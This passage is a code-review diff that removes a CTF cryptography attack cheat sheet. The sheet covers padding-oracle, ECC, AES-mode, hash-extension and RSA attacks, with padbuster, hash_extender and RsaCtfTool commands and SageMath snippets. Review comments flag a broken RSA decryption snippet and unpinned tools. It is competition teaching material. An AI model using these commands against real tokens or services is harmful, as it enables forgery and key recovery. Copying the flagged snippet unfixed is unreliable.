When you can detect valid vs invalid padding:
|
|
72
|
-
├── padbuster: padbuster <URL> <encrypted_sample> <block_size>
|
|
73
|
-
│ Options: -cookies "auth=<encrypted>" -encoding 0 (lowercase hex)
|
|
74
|
-
├── Manual: Compare response to correct vs incorrect padding
|
|
75
|
-
└── Decrypt AND forge new tokens — often leads to admin access
|
|
76
|
-
```
|
|
77
|
-
|
|
78
|
-
## Elliptic Curve Attacks
|
|
79
|
-
```
|
|
80
|
-
ECC vulnerabilities in CTF:
|
|
81
|
-
├── Invalid curve attack:
|
|
82
|
-
│ Point not validated → send point on weak curve
|
|
83
|
-
│ Compute DLP on weak curve → recover private key
|
|
84
|
-
├── Smart's attack: anomalous curves (trace=1)
|
|
85
|
-
│ Lift to p-adic → solve in O(1)
|
|
86
|
-
├── MOV attack: small embedding degree
|
|
87
|
-
│ Move DLP to finite field via Weil pairing
|
|
88
|
-
├── Pohlig-Hellman: smooth curve order
|
|
89
|
-
│ Factor order → solve DLP in subgroups → CRT
|
|
90
|
-
├── ECDSA nonce reuse (k reuse):
|
|
91
|
-
│ Two signatures with same k → recover private key
|
|
92
|
-
│ s1*k - H(m1) ≡ s2*k - H(m2) mod n
|
|
93
|
-
│ k = (H(m1) - H(m2)) / (s1 - s2) mod n
|
|
94
|
-
├── Biased nonce (lattice attack):
|
|
95
|
-
│ Partial nonce leak → Hidden Number Problem → LLL
|
|
96
|
-
└── Curve parameter manipulation:
|
|
97
|
-
Custom curve with weak parameters → check order
|
|
98
|
-
|
|
99
|
-
SageMath template:
|
|
100
|
-
E = EllipticCurve(GF(p), [a, b])
|
|
101
|
-
G = E(Gx, Gy)
|
|
102
|
-
P = E(Px, Py) # public key point
|
|
103
|
-
# discrete_log for small order:
|
|
104
|
-
d = G.discrete_log(P)
|
|
105
|
-
```
|
|
106
|
-
|
|
107
|
-
## AES / Block Cipher Attacks
|
|
108
|
-
```
|
|
109
|
-
Identify cipher mode and attack:
|
|
110
|
-
├── ECB detection: same plaintext block → same ciphertext block
|
|
111
|
-
│ Send repeated 16-byte blocks → check for repeating output
|
|
112
|
-
│ ECB penguin: byte-at-a-time chosen-plaintext → decrypt flag
|
|
113
|
-
├── CBC bit-flipping:
|
|
114
|
-
│ Modify ciphertext byte → predictable change in next block plaintext
|
|
115
|
-
│ Change "admin=0" → "admin=1" by XORing correct byte
|
|
116
|
-
│ Target byte: C[i][j] ^= old_val ^ new_val
|
|
117
|
-
├── CBC-MAC forgery:
|
|
118
|
-
│ Length extension if no length prepend
|
|
119
|
-
│ MAC(m1) ⊕ m2_first_block → forge MAC(m1 || m2)
|
|
120
|
-
├── CTR mode: nonce reuse → XOR ciphertexts → crib dragging
|
|
121
|
-
│ C1 ⊕ C2 = P1 ⊕ P2 → known plaintext reveals other
|
|
122
|
-
├── GCM nonce reuse: recover auth key H → forge tags
|
|
123
|
-
└── Key recovery:
|
|
124
|
-
Known plaintext + ciphertext → differential/linear cryptanalysis
|
|
125
|
-
Related-key attack: if key modification is possible
|
|
126
|
-
|
|
127
|
-
CyberChef operations for quick crypto:
|
|
128
|
-
├── AES Decrypt → try ECB/CBC with extracted key/IV
|
|
129
|
-
├── XOR → brute-force single-byte key (all 256)
|
|
130
|
-
├── From Hex / From Base64 → decode layers
|
|
131
|
-
└── Magic → auto-detect encoding/encryption
|
|
132
|
-
```
|
|
133
|
-
|
|
134
|
-
## Modern / Advanced Crypto
|
|
135
|
-
```
|
|
136
|
-
Lattice-based (common in hard CTF crypto):
|
|
137
|
-
├── LLL algorithm: basis reduction → find short vectors
|
|
138
|
-
│ from fpylll import IntegerMatrix, LLL
|
|
139
|
-
│ M = IntegerMatrix(rows)
|
|
140
|
-
│ LLL.reduction(M)
|
|
141
|
-
├── Knapsack crypto: reduce to SVP → LLL
|
|
142
|
-
├── Coppersmith: find small roots of polynomial mod N
|
|
143
|
-
│ SageMath: small_roots(X=bound, beta=0.5)
|
|
144
|
-
│ Common use: partial known plaintext in RSA
|
|
145
|
-
├── Hidden Number Problem (HNP):
|
|
146
|
-
│ Biased ECDSA nonce → LLL → recover key
|
|
147
|
-
└── NTRU: lattice-based → LLL reduction
|
|
148
|
-
|
|
149
|
-
Side-channel (rare but appears at DEF CON):
|
|
150
|
-
├── Timing attack: response time varies with input
|
|
151
|
-
│ → Character-by-character brute force with timing measurement
|
|
152
|
-
│ → Script: measure response_time for each char candidate
|
|
153
|
-
├── Power analysis: if given power traces
|
|
154
|
-
│ Differential Power Analysis (DPA) → recover AES key
|
|
155
|
-
└── Cache timing: Flush+Reload on shared libraries
|
|
156
|
-
```
|
|
157
|
-
|
|
158
|
-
## Hash Attacks (Beyond Cracking)
|
|
159
|
-
|
|
160
|
-
```
|
|
161
|
-
Length Extension Attack:
|
|
162
|
-
├── Vulnerable: MD5, SHA1, SHA256 (Merkle-Damgård construction)
|
|
163
|
-
├── NOT vulnerable: SHA3, HMAC, truncated hashes
|
|
164
|
-
├── Tool: hash_extender or HashPump
|
|
165
|
-
│ hash_extender --data "known" --secret-len 16 --append "admin=true" --signature <hash>
|
|
166
|
-
├── When to use: MAC = H(secret || user_data) → append data without knowing secret
|
|
167
|
-
└── Result: valid MAC for extended message
|
|
168
|
-
|
|
169
|
-
Collision Attack:
|
|
170
|
-
├── MD5: Generate two files with same MD5 hash
|
|
171
|
-
│ Tool: fastcoll or HashClash
|
|
172
|
-
│ Use: bypass file comparison, forge certificates
|
|
173
|
-
├── SHA1: SHAttered (practical collision exists)
|
|
174
|
-
└── When: "if md5(file1) == md5(file2)" type checks
|
|
175
|
-
|
|
176
|
-
Rainbow Table:
|
|
177
|
-
├── CrackStation: crackstation.net for quick lookups
|
|
178
|
-
├── hashes.org: community hash lookup
|
|
179
|
-
├── For custom charsets: rtgen from RainbowCrack project
|
|
180
|
-
└── Limited to unsalted hashes
|
|
181
|
-
```
|
|
182
|
-
|
|
183
|
-
## RSA — Extended Attack Catalog
|
|
184
|
-
|
|
185
|
-
```
|
|
186
|
-
═══════════════════════════════════════
|
|
187
|
-
Franklin-Reiter Related Message:
|
|
188
|
-
═══════════════════════════════════════
|
|
189
|
-
├── Two messages with known relationship: m2 = a*m1 + b
|
|
190
|
-
├── Same RSA key → gcd of polynomials → recover both messages
|
|
191
|
-
├── Common: m2 = m1 + padding_difference
|
|
192
|
-
└── SageMath: gcd of (x^e - c1) and ((a*x+b)^e - c2) in Z_n[x]
|
|
193
|
-
|
|
194
|
-
═══════════════════════════════════════
|
|
195
|
-
Boneh-Durfee:
|
|
196
|
-
═══════════════════════════════════════
|
|
197
|
-
├── Small private exponent (d < n^0.292)
|
|
198
|
-
├── Stronger than Wiener's (which requires d < n^0.25)
|
|
199
|
-
├── Lattice-based: construct lattice → LLL → factor n
|
|
200
|
-
└── Tool: web_search("boneh durfee RSA CTF implementation")
|
|
201
|
-
|
|
202
|
-
═══════════════════════════════════════
|
|
203
|
-
Multi-prime RSA:
|
|
204
|
-
═══════════════════════════════════════
|
|
205
|
-
├── n = p * q * r (or more primes)
|
|
206
|
-
├── phi = (p-1)(q-1)(r-1)
|
|
207
|
-
├── Each extra prime → easier to factor
|
|
208
|
-
├── factordb.com often factors multi-prime n
|
|
209
|
-
└── Lambda function: lcm(p-1, q-1, r-1) — may be needed for d
|
|
210
|
-
|
|
211
|
-
═══════════════════════════════════════
|
|
212
|
-
Chinese Remainder Theorem (CRT):
|
|
213
|
-
═══════════════════════════════════════
|
|
214
|
-
├── When: m^e < n (small message, large modulus)
|
|
215
|
-
│ Direct e-th root: m = iroot(c, e) (integer root)
|
|
216
|
-
├── Hastad improved with CRT:
|
|
217
|
-
│ Multiple (n_i, c_i) with same e → CRT → then e-th root
|
|
218
|
-
├── When: same message encrypted with different moduli
|
|
219
|
-
└── SageMath: CRT_list(remainders, moduli)
|
|
220
|
-
|
|
221
|
-
═══════════════════════════════════════
|
|
222
|
-
RSA with known bits:
|
|
223
|
-
═══════════════════════════════════════
|
|
224
|
-
├── Partial p/q known → Coppersmith small_roots
|
|
225
|
-
├── Partial d known → Coppersmith on d
|
|
226
|
-
├── Example: "p starts with AAAA..." → known MSB → Coppersmith
|
|
227
|
-
└── SageMath: f.small_roots(X=2^unknown_bits, beta=0.5)
|
|
228
|
-
```
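Review bot: the block headed "Chinese Remainder Theorem (CRT)" opens at removed lines 214-215 with the `m^e < n` direct-root case, which involves no CRT, and line 217 describes the Hastad case as "Multiple (n_i, c_i) with same e" without stating that it needs at least e ciphertexts of the same unpadded message under pairwise coprime moduli. Suggest giving the direct-root case its own heading and writing the precondition out, so the entry cannot be read as applying to any set of ciphertexts.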
|
|
229
|
-
|
|
230
|
-
## Automated Crypto Solving Strategy
|
|
231
|
-
|
|
232
|
-
```
|
|
233
|
-
CTF crypto decision tree:
|
|
234
|
-
1. Check: is it a KNOWN cipher? (RSA, AES, XOR, custom)
|
|
235
|
-
2. Extract all parameters from challenge
|
|
236
|
-
3. For RSA:
|
|
237
|
-
├── Try RsaCtfTool first (covers 40+ attacks automatically!)
|
|
238
|
-
│ python3 RsaCtfTool.py -n <n> -e <e> --uncipher <c> --attack all
|
|
239
|
-
├── Try factordb.com for n
|
|
240
|
-
├── Check e: small e → Hastad/cube root, large e → Wiener/Boneh-Durfee
|
|
241
|
-
├── Multiple ciphertexts? → CRT / Franklin-Reiter
|
|
242
|
-
└── Weird parameters? → web_search("RSA CTF <description>")
|
|
243
|
-
4. For AES:
|
|
244
|
-
├── ECB? → byte-at-a-time or ECB penguin
|
|
245
|
-
├── CBC? → padding oracle or bit-flip
|
|
246
|
-
├── CTR? → nonce reuse → XOR
|
|
247
|
-
└── Custom mode? → analyze and find weakness
|
|
248
|
-
5. For custom cipher:
|
|
249
|
-
├── Read the code CAREFULLY
|
|
250
|
-
├── Look for: weak randomness, reused key, algebraic weakness
|
|
251
|
-
├── Z3 solver for constraint problems
|
|
252
|
-
└── Brute-force if keyspace < 2^32
|
|
253
|
-
6. For encoding puzzles:
|
|
254
|
-
├── CyberChef Magic (auto-detect)
|
|
255
|
-
├── Multi-layer decode: base64 → hex → XOR → rot13
|
|
256
|
-
└── dcode.fr for classical ciphers
|
|
257
|
-
|
|
258
|
-
Essential tools:
|
|
259
|
-
├── RsaCtfTool: github.com/RsaCtfTool/RsaCtfTool
|
|
260
|
-
├── SageMath: for all mathematical crypto
|
|
261
|
-
├── CyberChef: gchq.github.io/CyberChef
|
|
262
|
-
├── PyCryptodome: python crypto library
|
|
263
|
-
├── z3-solver: constraint solving
|
|
264
|
-
├── factordb.com: integer factorization
|
|
265
|
-
└── dcode.fr: classical cipher solver
|
|
266
|
-
```
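Review bot: the tool references at removed lines 237-242 and 259-265 are unpinned. RsaCtfTool is named by repository URL only, line 238 runs it directly, and line 242 falls back to `web_search("RSA CTF <description>")`, so the code that ends up being executed depends on whatever the repository head or a search result contains at that moment. If this list is carried forward, name a reviewed release or commit for each tool and drop the open-ended search as a source of runnable code.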
|
|
267
|
-
|
|
268
|
-
## SageMath Essential Patterns
|
|
269
|
-
|
|
270
|
-
```python
|
|
271
|
-
# RSA decryption
|
|
272
|
-
n, e, c = ...
|
|
273
|
-
p, q = factor(n) # or from factordb
|
|
274
|
-
phi = (p-1)*(q-1)
|
|
275
|
-
d = inverse_mod(e, phi)
|
|
276
|
-
m = pow(c, d, n)
|
|
277
|
-
bytes.fromhex(hex(m)[2:])
|
|
278
|
-
|
|
279
|
-
# Coppersmith (small roots)
|
|
280
|
-
P.<x> = PolynomialRing(Zmod(n))
|
|
281
|
-
f = x + known_prefix
|
|
282
|
-
roots = f.small_roots(X=2^64, beta=0.5)
|
|
283
|
-
|
|
284
|
-
# Lattice reduction (LLL)
|
|
285
|
-
M = matrix(ZZ, [...])
|
|
286
|
-
M_reduced = M.LLL()
|
|
287
|
-
|
|
288
|
-
# ECC discrete log
|
|
289
|
-
E = EllipticCurve(GF(p), [a, b])
|
|
290
|
-
G = E(Gx, Gy)
|
|
291
|
-
P = E(Px, Py)
|
|
292
|
-
d = discrete_log(P, G, G.order(), operation='+')
|
|
293
|
-
|
|
294
|
-
# CRT
|
|
295
|
-
x = crt([r1, r2, r3], [m1, m2, m3])
|
|
296
|
-
```
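Review bot: in the RSA decryption snippet, `p, q = factor(n)` at removed line 273 does not produce the two primes in SageMath. Iterating a factorization yields (prime, exponent) pairs, so `phi = (p-1)*(q-1)` on line 274 fails with a type error. Line 277, `bytes.fromhex(hex(m)[2:])`, also raises whenever the hex string has an odd number of digits. The snippets further reuse `P` (polynomial ring at line 280, curve point at line 291) and `d` (RSA exponent, then discrete log), which shadow each other when run in one session. If the block is kept anywhere, unpack with `(p, _), (q, _) = factor(n)`, convert `m` with an explicit byte length, and give the later variables distinct names.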
|